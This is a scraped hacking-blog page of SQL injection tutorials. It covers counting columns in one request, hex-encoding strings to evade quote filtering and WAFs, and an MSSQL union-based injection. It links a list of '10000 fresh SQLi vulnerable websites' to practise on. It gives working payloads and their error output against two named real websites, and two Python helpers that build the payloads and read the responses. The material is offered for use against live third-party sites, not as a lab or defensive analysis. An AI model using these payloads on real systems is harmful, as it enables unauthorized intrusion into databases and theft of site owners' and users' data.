<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNasoqGln0rJiQ5Gh1uLnvd4chcACwQlAPFZnNZb7tdOpKvm5_thyphenhyphenFfLaOaLz2lAtOfnc3UT7PZU6Uf6vszZ9e2VKtNWOfM75mXoWybQHV0oYPlYk57q6QG7hur2GFEi9kBpvyfK4YHPnd/s1600/10000+Fresh+SQLi+Vulnerable+Websites+List.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="10000 Fresh SQLi Vulnerable Websites 2015 List" border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNasoqGln0rJiQ5Gh1uLnvd4chcACwQlAPFZnNZb7tdOpKvm5_thyphenhyphenFfLaOaLz2lAtOfnc3UT7PZU6Uf6vszZ9e2VKtNWOfM75mXoWybQHV0oYPlYk57q6QG7hur2GFEi9kBpvyfK4YHPnd/s400/10000+Fresh+SQLi+Vulnerable+Websites+List.png" title="10000 Fresh SQLi Vulnerable Websites 2015 List" width="400" /></a></div>
<br />
<span style="font-weight: normal;">Here is a list of 10000 fresh SQLi vulnerable websites for practice. These vulnerable websites will help you polish your skills. You can use these sites to improve your skills in SQLi, and for tutorials keep in touch with <b>www.raijee1337.blogspot.com</b>. You can also comment with your questions in case of any problem while injecting.</span><br />
For the 10000 fresh SQLi vulnerable sites visit this link: http://pastebin.com/ATJE7VdZ<br />
<br />
<h2>Alternative Ways For Counting Columns At One Request</h2>
Published 2015-08-06.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7-wphxtwHUFtXs8kZK9jZC9gFHU5yP4IDzZUzupjeh_YGjuh1E0QUdds1i0iYqRB6pa6XgrJDXBsh4fdKlKsTpiOxv6pz1teH2qkgJfkLkDU7LUtY0s6g7G4lkZtIOfCCipQmz5ZaG-qt/s1600/Alternative+Ways+For+Counting+Columns+At+One+Request+www.raijee1337.blogspot.com+tut.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Counting Columns At One Request" border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7-wphxtwHUFtXs8kZK9jZC9gFHU5yP4IDzZUzupjeh_YGjuh1E0QUdds1i0iYqRB6pa6XgrJDXBsh4fdKlKsTpiOxv6pz1teH2qkgJfkLkDU7LUtY0s6g7G4lkZtIOfCCipQmz5ZaG-qt/s400/Alternative+Ways+For+Counting+Columns+At+One+Request+www.raijee1337.blogspot.com+tut.png" title="Alternative Ways For Counting Columns At One Request" width="400" /></a></div>
In this tutorial I discuss the ways to count all the columns of a query in a single request. Normally we use ORDER BY and count the columns one by one, which takes time, and we are always looking for easier ways, so this guide covers a few of them.<br />
These are some of the best methods I know for counting columns quickly.<br />
<a name='more'></a><br />
<br />
<h2>
<b>METHOD 1</b> </h2>
<h3>
Using GROUP BY</h3>
This method is known to some people, but I'm covering it for newbies as well.<br />
It is very simple: we build one GROUP BY with a long run of column positions. MySQL resolves each position against the select list and fails on the first one that does not exist, so a single request tells us the total number of columns. The run must be longer than the real column count (100 is plenty for most queries).<br />
<br />
<b>For Example</b>,<br />
<b>http://www.pistoiablues.com/news.php?id=111' group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- +</b><br />
The error in the response gives us the total number of columns:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisQ4YsrDvMVoUJttht7C-35q2HkHqLvRFGx_l6Bjc2VBp-OjhocFTfyheC5AJiITwa5rYyQfvq5tWp5GWmM4CgEmnFlKVpFupdKX0sAL6N_Q2ukC9GcotTZzqRQT9V0QE0FgwRTXDMV-j2/s1600/Alternative+Ways+For+Counting+Columns+At+One+Request1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Counting Columns At One Request" border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisQ4YsrDvMVoUJttht7C-35q2HkHqLvRFGx_l6Bjc2VBp-OjhocFTfyheC5AJiITwa5rYyQfvq5tWp5GWmM4CgEmnFlKVpFupdKX0sAL6N_Q2ukC9GcotTZzqRQT9V0QE0FgwRTXDMV-j2/s640/Alternative+Ways+For+Counting+Columns+At+One+Request1.png" title="Alternative Ways For Counting Columns At One Request" width="640" /></a></div>
<br />
<b>Unknown column '9' in 'group statement'</b><br />
Position 9 is the first one that does not exist, so there are <b>8 columns</b> in total.<br />
<br />
<h2>
<b>METHOD 2</b></h2>
<h3>
<b>Using COUNT Function</b></h3>
In this method we use <b>COUNT()</b> inside an <a href="http://raijee1337.blogspot.com/search/label/XPATH%20Injection%20Using%20Extractvalue" target="_blank">XPATH</a> or <a href="http://raijee1337.blogspot.com/search/label/Error%20Based%20Injection%20-Tutorial" target="_blank">error based</a> injection so that the number comes back inside an error message. We also have to guess (or already know) one table name: the query counts the rows of information_schema.columns for that table, so the result is the number of columns in that table. That equals the query's column count only when the page's query is SELECT * from that table (see Method 4 for where the table name usually comes from).<br />
I Will Use <a href="http://raijee1337.blogspot.com/search/label/XPATH%20Injection%20Using%20Extractvalue" target="_blank">XPATH Injection With Extractvalue</a>.<br />
<b>For Example,</b><br />
<br />
<b>http://www.pistoiablues.com/news.php?id=111' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='<span style="color: red;">TABLE_NAME_HERE</span>' and table_schema=database())))--+</b><br />
<br />
Replace <b><span style="color: red;">TABLE_NAME_HERE</span></b> with a table name from the current database and execute the command. The XPath error echoes the number of columns that table has.<br />
<br />
<b>http://www.pistoiablues.com/news.php?id=111' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='<span style="color: red;">news</span>' and table_schema=database())))--+</b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTjtriqDbESpe3Zk52tXJdHIqxRYIv6Pvf3Rh6ReQ2u4vcGHVlSZTQdbQxc-KK_oX7PTIeWvEV-8olMv8cbtHm2F_m4o8UFdgRq3UoCwV1Og83XTbJwsTN-nm1uPACDQoe-9_xRQWkwKhO/s1600/Alternative+Ways+For+Counting+Columns+At+One+Request2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Counting Columns At One Request" border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTjtriqDbESpe3Zk52tXJdHIqxRYIv6Pvf3Rh6ReQ2u4vcGHVlSZTQdbQxc-KK_oX7PTIeWvEV-8olMv8cbtHm2F_m4o8UFdgRq3UoCwV1Og83XTbJwsTN-nm1uPACDQoe-9_xRQWkwKhO/s640/Alternative+Ways+For+Counting+Columns+At+One+Request2.png" title="Alternative Ways For Counting Columns At One Request" width="640" /></a></div>
<br />
<b>XPATH syntax error: ':8'</b><br />
So the table has <b>8 columns</b> in total.<br />
<br />
<h2>
<b>METHOD 3</b></h2>
<h3>
<b>USING PROCEDURE ANALYSE Function</b></h3>
Few people know this method. We append <b>PROCEDURE ANALYSE()</b> to the query. Instead of the data rows, MySQL then returns one analysis row per column of the select list, so the number of rows the page renders equals the column count. Two caveats: PROCEDURE must be the last clause of the statement (the trailing comment takes care of anything that follows the injection point), and PROCEDURE ANALYSE() exists only in MySQL 5.x; it was removed in MySQL 8.0.<br />
<br />
<b>http://www.pistoiablues.com/news.php?id=111' Procedure Analyse()--+</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK9YDUj44KjbW08FwU08ekaYnUtVIb_02zEwZPyan-xD7KEKv6l8QfJKk7v3N_ynFcl5RkIyTZShrfUCpt5hPTCYweO8P6o3htz2hejoIKvQFgt7hrjCoP5rNxs8VSRjr4-anzDAlV8lbk/s1600/Alternative+Ways+For+Counting+Columns+At+One+Request3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Counting Columns At One Request" border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK9YDUj44KjbW08FwU08ekaYnUtVIb_02zEwZPyan-xD7KEKv6l8QfJKk7v3N_ynFcl5RkIyTZShrfUCpt5hPTCYweO8P6o3htz2hejoIKvQFgt7hrjCoP5rNxs8VSRjr4-anzDAlV8lbk/s400/Alternative+Ways+For+Counting+Columns+At+One+Request3.png" title="Alternative Ways For Counting Columns At One Request" width="400" /></a></div>
<span style="font-weight: normal;">Here we didn't get any error, but if we look at the page we can see 8 slashes, one per analysed column, so the <b>total number</b> of <b>columns</b> is <b>8</b>.</span><br />
<br />
<h2>
<span style="font-weight: normal;"><b>METHOD 4 </b></span></h2>
<h3>
<span style="font-weight: normal;"><b>Using URL Tables </b></span></h3>
<span style="font-weight: normal;">In this method we derive the table name from the vulnerable script's file name in the target URL, because the script's query usually selects from a table of the same name. For example:</span><br />
<b><span style="font-weight: normal;"><b><span style="color: red;">Product</span>.php?id=</b></span></b><br />
<b><span style="font-weight: normal;"><b><span style="color: red;">Page</span>.php?id=</b></span></b><br />
<span style="font-weight: normal;"><b><span style="color: red;">News</span>.php?id=</b></span><br />
<span style="font-weight: normal;">The <b>SQL query</b> behind such a <b>PHP script</b> reads from a table named after the page. For example, when we send a column-count command:</span><br />
<br />
<span style="font-weight: normal;"><b>News.php?id=2 order by 3</b></span><br />
<br />
<span style="font-weight: normal;">the <b>query</b> that runs behind it is</span><br />
<span style="font-weight: normal;"><b> </b></span><br />
<span style="font-weight: normal;"><b><span style="color: red;">SELECT * FROM NEWS WHERE ID=2</span></b></span><br />
<span style="font-weight: normal;"><b> </b></span><span style="font-weight: normal;"> </span><br />
<span style="font-weight: normal;">We use that table name in a row comparison that makes MySQL report the row width. As with Method 2, this counts the table's columns, which match the query's only when the query is SELECT * from that table.</span><br />
<br />
<span style="font-weight: normal;"><b>http://www.pistoiablues.com/<span style="color: red;">news</span>.php?id=111' and (select * from <span style="color: red;">news</span>)=(select 0)--+</b></span><br />
<span style="font-weight: normal;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihjJ0gI_DA7UPCxpYnwyhpI4rCKa81gVGbkZgV_fCNX9OMPcMgWgA7oVJ4PUsZSuMmF8n83eK5p1LEi0Fs27JVxAK8m-_pzKhUCVGSxfXko9Puhs4R_vftuPMTzwLbaHDAp7iuT1ltsgIy/s1600/Alternative+Ways+For+Counting+Columns+At+One+Request4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Counting Columns At One Request" border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihjJ0gI_DA7UPCxpYnwyhpI4rCKa81gVGbkZgV_fCNX9OMPcMgWgA7oVJ4PUsZSuMmF8n83eK5p1LEi0Fs27JVxAK8m-_pzKhUCVGSxfXko9Puhs4R_vftuPMTzwLbaHDAp7iuT1ltsgIy/s400/Alternative+Ways+For+Counting+Columns+At+One+Request4.png" title="Alternative Ways For Counting Columns At One Request" width="400" /></a></div>
<b>Operand should contain 8 column(s)</b><br />
So the table has <b>8</b> <b>columns</b> in total.<br />
These are easy and simple ways to count the total number of columns in one request, and they will help you while injecting.<br />
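As an added example (not code from the original post), the following Python helper does the reading for the four methods above: it maps the three MySQL error messages quoted on this page to a column count and builds the single-request payloads. The response bodies below are constructed from the errors shown above, not captured from a live site; the target, parameter and table name are whatever you pass in. It keeps the GROUP BY result separate from the table-based ones, because Methods 2 and 4 count the columns of the named table, which only equals the query's column count when the script does SELECT * from it.

```python
import re
from typing import Optional, Tuple

# One pattern per MySQL error quoted on the page; the captured number gives the count.
GROUP_BY_RE = re.compile(r"Unknown column '(\d+)' in 'group statement'")
XPATH_RE = re.compile(r"XPATH syntax error: ?':(\d+)'")
OPERAND_RE = re.compile(r"Operand should contain (\d+) column\(s\)")


def column_count(body: str) -> Optional[Tuple[str, int]]:
    """Map an error echoed in a response body to (method, column count), or None."""
    m = GROUP_BY_RE.search(body)
    if m:
        # Position N is the first one past the select list, so N-1 columns exist.
        return "group_by", int(m.group(1)) - 1
    m = XPATH_RE.search(body)
    if m:
        # count(*) over information_schema.columns: columns of the named table.
        return "count", int(m.group(1))
    m = OPERAND_RE.search(body)
    if m:
        # Row comparison: columns of the named table again.
        return "operand", int(m.group(1))
    return None


def group_by_payload(upper: int = 100) -> str:
    """Method 1: GROUP BY positions 1..upper; upper must exceed the real column count."""
    return "' group by %s-- -" % ",".join(str(i) for i in range(1, upper + 1))


def count_payload(table: str) -> str:
    """Method 2: extractvalue() leaks count(*) of the table's columns in an XPath error."""
    return ("' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns "
            "where table_name='%s' and table_schema=database())))-- -" % table)


def operand_payload(table: str) -> str:
    """Method 4: comparing a whole row of the table with a 1-column row reports its width."""
    return "' and (select * from %s)=(select 0)-- -" % table


def table_from_script(url: str) -> str:
    """Method 4's guess: news.php -> news; the script usually selects from a table of that name."""
    return url.rsplit("/", 1)[-1].split(".", 1)[0].lower()


# Constructed response bodies, copied from the errors shown on the page (not live output).
SAMPLE_RESPONSES = {
    "group_by": "Unknown column '9' in 'group statement'",
    "count": "XPATH syntax error: ':8'",
    "operand": "Operand should contain 8 column(s)",
}

if __name__ == "__main__":
    print(table_from_script("http://www.pistoiablues.com/news.php?id=111"))
    for method, body in SAMPLE_RESPONSES.items():
        print(method, column_count(body))
```

If `column_count` returns a different number for `group_by` than for `count` or `operand`, the page's query is not a plain SELECT * over the guessed table, and the GROUP BY figure is the one to use for the UNION.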
<br />
<b> </b><br />
<b><span style="color: #fce5cd;"><span style="color: #ea9999;">HAP</span><span style="color: #d0e0e3;">PY</span></span> <span style="color: #660000;">INJEC</span><span style="color: #d9d2e9;">TING<span style="color: #674ea7;"> </span></span><span style="color: #674ea7;">!!</span></b><br />
<br />
<b>AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee</b>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com2tag:blogger.com,1999:blog-5545325473666478334.post-56321425382714240742015-08-03T08:20:00.000-07:002015-08-17T09:08:11.905-07:00Converting Syntax in Hex Value - SQLi Tips<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4jMtRFZgaOr2SUQbRo5KKipzpGYVAzCrSeXmAVKk5exVGj99N4TKPcS1p5fch4PpzwfBwb40P-rEUq62mF9FC22f3tCUhOWIDK3G_U5XOToAPJAMEti2GpAL0QpkmOufs2Oiey21SNK-B/s1600/Converting+Syntax+in+Hex+Value+-+SQLi+Tips.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Syntax in Hex Value" border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4jMtRFZgaOr2SUQbRo5KKipzpGYVAzCrSeXmAVKk5exVGj99N4TKPcS1p5fch4PpzwfBwb40P-rEUq62mF9FC22f3tCUhOWIDK3G_U5XOToAPJAMEti2GpAL0QpkmOufs2Oiey21SNK-B/s320/Converting+Syntax+in+Hex+Value+-+SQLi+Tips.png" title="Converting Syntax in Hex Value - SQLi Tips" width="320" /></a><br />
After a long time I'm back with another tutorial on SQL injection. In this tutorial we discuss <b>converting syntax to hex values</b>; many newcomers (myself included, once) don't know how to use <b>hex values</b>.<br />
Sometimes during regular manual injection we come across sites where our SQLi command returns no data.<br />
<a name='more'></a><br />
For example, we want to print our name on the web page, so we normally put the name in the vulnerable column enclosed in single quotes:<br />
<br />
<b>https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(<span style="color: red;">'RAi Jee'</span>),3,4-- -</b><br />
<br />
Sometimes this doesn't work when executed. The usual reason is that the site escapes or strips <span style="color: red;">single quotes</span> before they reach the query (PHP's magic_quotes_gpc / addslashes), or a WAF blocks requests containing them.<br />
In such cases we avoid quotes altogether by writing the string as a hex literal.<br />
We can convert with the HackBar add-on, or with an online converter such as the one below:<br />
<b>Link:www.asciitohex.com</b><br />
<br />
<b>Our Syntax:<span style="color: red;">RAi Jee</span></b><br />
<b><span style="color: red;"><span style="color: black;">Hex Value:<span style="color: red;">524169204a6565</span></span></span></b><br />
We put <b><span style="color: red;">0x</span></b> in front of the hex digits so MySQL reads the value as a hex literal, which behaves like a string but needs no quotes.<br />
<b>https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(</b><b><b><span style="color: red;"><span style="color: black;"><span style="color: red;">0x524169204a6565</span></span></span></b>),3,4-- -</b><br />
<br />
The same works anywhere a quoted string is needed, for example a table name in a WHERE clause:<br />
<br />
<b>https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(column_name</b><b>),3,4 from information_schema.columns where table_name=<span style="color: red;">'ADMIN'</span>-- -</b><br />
If that doesn't work, we hex-encode the table name:<br />
<br />
<span style="color: red;"><b>0x41444d494e</b> (hex value of ADMIN)</span><br />
<br />
<b>https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(column_name),3,4 from information_schema.columns where table_name=<span style="color: red;">0x41444d494e</span>-- -</b><br />
<br />
We can also hex-encode HTML tags whenever single quotes cannot be used. One caveat: a hex literal is a binary string, so if a lookup that worked with the quoted value fails with its hex form, check that the case of the encoded value matches the stored one exactly.<br />
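As an added example that is not part of the original post, this small Python helper does the HackBar/asciitohex step offline: it turns a string into a MySQL 0x hex literal and rewrites every quoted literal inside an injection fragment. It assumes the fragment passed in is the SQL after the injection point, so the quote used to break out of the original string (as in id=11') is not part of the input; only backslash-escaped quotes and backslashes inside a literal are unescaped, which is a simplification of MySQL's full escape rules.

```python
import re

# A single-quoted SQL literal; backslash-escaped characters inside it are allowed.
QUOTED_LITERAL = re.compile(r"'((?:[^'\\]|\\.)*)'")


def to_hex_literal(text: str) -> str:
    """Encode a string as a MySQL hex literal of its UTF-8 bytes: RAi Jee -> 0x524169204a6565."""
    return "0x" + text.encode("utf-8").hex()


def unescape(literal: str) -> str:
    """Undo backslash escapes so the bytes match what MySQL would see (simplified: \\x -> x)."""
    return re.sub(r"\\(.)", r"\1", literal)


def hexify(fragment: str) -> str:
    """Rewrite every quoted literal in an injection fragment as a 0x hex literal."""
    return QUOTED_LITERAL.sub(lambda m: to_hex_literal(unescape(m.group(1))), fragment)


if __name__ == "__main__":
    # Fragments from the post, i.e. what follows "id=11 and false union select" (constructed).
    for frag in ("1,2,group_concat('RAi Jee'),3,4-- -",
                 "1,2,group_concat(column_name),3,4 from information_schema.columns "
                 "where table_name='ADMIN'-- -"):
        print(hexify(frag))
```

Because the output contains no quote characters at all, it survives both quote-escaping (addslashes) and a WAF rule that simply rejects a single quote.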
<br />
<b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</b>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com0tag:blogger.com,1999:blog-5545325473666478334.post-77595476257246500532015-07-22T07:12:00.001-07:002015-08-17T09:03:36.766-07:00MSSQL Union Based Injection Part-2 - Advanced Method<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<img alt="MSSQL Union Based Injection Part-2 - Advanced Method" border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMUKqQJtkCSuHwTtJGqjh85RKbJBRuCXJ7rqD92QHr7nB5rTkVRSe5vdiSq6Xwj3qRuK1UQMBjLc8lCZBqy9jBU7f7Z9wzyBEnoo4TmmdGMFdOTx99y8y2mYhJG54uIXCyVPQstXKT204u/s320/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+www.raijee1337.blogspot.com+1.png" title="MSSQL Union Based Injection Part-2 - Advanced Method" width="320" />
</div>
<span style="font-size: small;">In our previous tutorials about MSSQL injection we covered the basics:</span><br />
<span style="font-size: small;"><a href="http://www.raijee1337.blogspot.com/2015/07/mssql-union-based-injection-step-by.html" target="_blank">MSSQL UNION BASED INJECTION</a></span><br />
<span style="font-size: small;"><a href="http://www.raijee1337.blogspot.com/2015/07/mssql-injection-using-convert.html" target="_blank">MSSQL INJECTION USING CONVERT </a></span><br />
<span style="font-size: small;"><a href="http://www.raijee1337.blogspot.com/2015/07/ms-access-injection-tutorial.html" target="_blank">MS-ACCESS INJECTION</a></span><br />
<span style="font-size: small;">In this tutorial you will learn an advanced method that helps when the basic approach gets stuck.</span><br />
<a name='more'></a><br />
<span style="font-size: small;">On normal sites we do ORDER BY, count the columns and then prepare a UNION based command to find the vulnerable columns, but in some cases the UNION step gets stuck.</span><br />
<span style="font-size: small;">For this tutorial I have found a site for practice.</span><br />
<span style="font-size: small;">First we check the vulnerability by adding a single quote ' at the end of the parameter.</span><br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives'</b></span><br />
<span style="font-size: small;">Executing the URL gives us an error!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuDOal8TtDvWpZqi4xhcEGohJD_UbdY7Xq_MB7NEFpoiNI0E_gciPsWp6KOAI-qRv36w7Z7D0ZY0gUFME1_ncWlQ6FCTXst5wmMm6Xa7Ld6VMIJD7UEaoXVr8ne1OrQD1lCMEitCWUKlPv/s1600/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection Part-2 - Advanced Method" border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuDOal8TtDvWpZqi4xhcEGohJD_UbdY7Xq_MB7NEFpoiNI0E_gciPsWp6KOAI-qRv36w7Z7D0ZY0gUFME1_ncWlQ6FCTXst5wmMm6Xa7Ld6VMIJD7UEaoXVr8ne1OrQD1lCMEitCWUKlPv/s400/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+1.png" title="MSSQL Union Based Injection Part-2 - Advanced Method" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Our target is vulnerable, so let's inject manually.</span><br />
<span style="font-size: small;">First let's check how many columns there are, using ORDER BY.</span><br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 1--+</b></span><br />
<span style="font-size: small;"><b>No ERROR !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 100---+</b></span><br />
<span style="font-size: small;"><b>Again No Error !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 1000---+</b></span><br />
<span style="font-size: small;"><b>Still No Error !!</b></span><br />
<span style="font-size: small;"><b><br /></b>
No error even at ORDER BY 1000 means our ORDER BY is never evaluated: the parameter is a string, so everything we append stays inside the quotes. Let's try string based injection and close the quote. If you look at the <b>error response</b> from the first request, the query also wraps our value in a bracket " <b>)</b> ", so we close that as well and inject after <b>')</b>.</span><br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 1---+</b></span><br />
<span style="font-size: small;"><b>No Error !! Site Loaded Normally .</b></span><br />
<br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 6---+</b></span><br />
<span style="font-size: small;"><b>Again No Error !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 7---+</b></span><br />
<span style="font-size: small;"><b>Here we got an error!</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizQfQ_XSRBEjDadtIqibGoqEVAWu5m60pnen3sYCJYJR39zbjuG-4W_RvpN3IOwhFsbMv-wzR7VODBkXymOGD6qt7-webmNuyxxudu8IzQfvMUXNbENJJ8NQTZcxWfKrQQrpHoLIbkWonZ/s1600/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection Part-2 - Advanced Method" border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizQfQ_XSRBEjDadtIqibGoqEVAWu5m60pnen3sYCJYJR39zbjuG-4W_RvpN3IOwhFsbMv-wzR7VODBkXymOGD6qt7-webmNuyxxudu8IzQfvMUXNbENJJ8NQTZcxWfKrQQrpHoLIbkWonZ/s400/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+2.png" title="MSSQL Union Based Injection Part-2 - Advanced Method" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>ERROR:</b></span><br />
<span style="font-family: Arial; font-size: small;">Microsoft OLE DB Provider for ODBC Drivers</span><span style="font-size: small;"> <span style="font-family: Arial;">error '80040e14'</span></span>
<br />
<span style="font-family: Arial; font-size: small;">[Microsoft][ODBC SQL Server Driver][SQL
Server]<span style="color: red;">The ORDER BY position number 7 is out of range of the number of
items in the select list.</span></span>
<br />
<span style="font-family: Arial; font-size: small;">/products.asp</span><span style="font-family: Arial; font-size: small;">, line 131</span> <br />
<span style="font-size: small;"><b><br /></b>So there are 6 columns in total. Now let's prepare our UNION based command to find the vulnerable columns.</span><br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives') union select 1,2,3,4,5,6---+</b></span><br />
<span style="font-size: small;">But here we got an error!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyZfNMWjjLOlg7lLTXXJNfIjNqw0hqGAOWrbZ6vaXh1KDlIotU5r-CTHxga1RHUEGouq6nnhCZ0dFKK4mgW-m3gh_QViehu-tB_G4GbtJLjV5LUd2jzp0aRqBLdrJNe4dJB7nToul9VkUv/s1600/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection Part-2 - Advanced Method" border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyZfNMWjjLOlg7lLTXXJNfIjNqw0hqGAOWrbZ6vaXh1KDlIotU5r-CTHxga1RHUEGouq6nnhCZ0dFKK4mgW-m3gh_QViehu-tB_G4GbtJLjV5LUd2jzp0aRqBLdrJNe4dJB7nToul9VkUv/s400/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+8.png" title="MSSQL Union Based Injection Part-2 - Advanced Method" width="400" /></a></span></div>
<br />
<span style="font-size: small;"><b>ERROR:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for ODBC Drivers</span> <span style="font-family: Arial;">error '80040e07'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">[Microsoft][ODBC SQL Server Driver][SQL Server<span style="color: red;">]Conversion failed when converting the varchar value 'PenDrives' to data type int.</span></span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/products.asp</span><span style="font-family: Arial;">, line 131</span></b></span> <br />
<span style="font-size: small;">Our column count is correct; the problem is the data types. SQL Server requires each column of the two halves of a UNION to be type-compatible, and an int literal outranks varchar in data type precedence, so it tries to convert the original query's value 'PenDrives' to int and fails. NULL is compatible with every type, so we replace the numbers with NULLs and run the UNION again.</span><br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives') and 1=2 union select null,null,null,null,null,null---+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Bingo, error bypassed!</b></span><br />
<span style="font-size: small;">But we can't see which columns are displayed on the page, so we check the columns one by one. First let's check the version: we put @@version in the first column, then set it back to null and move on to the next one.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select @@version,null,null,null,null,null--+</b></span><br />
<span style="font-size: small;">Here we got the version. Note how it arrived: the first column of the original query is a smallint, so SQL Server could not convert the version string to it and echoed the string inside the conversion error. That error is what we read our data from in the following steps.</span><br />
<div class="separator" style="clear: both; text-align: center;">
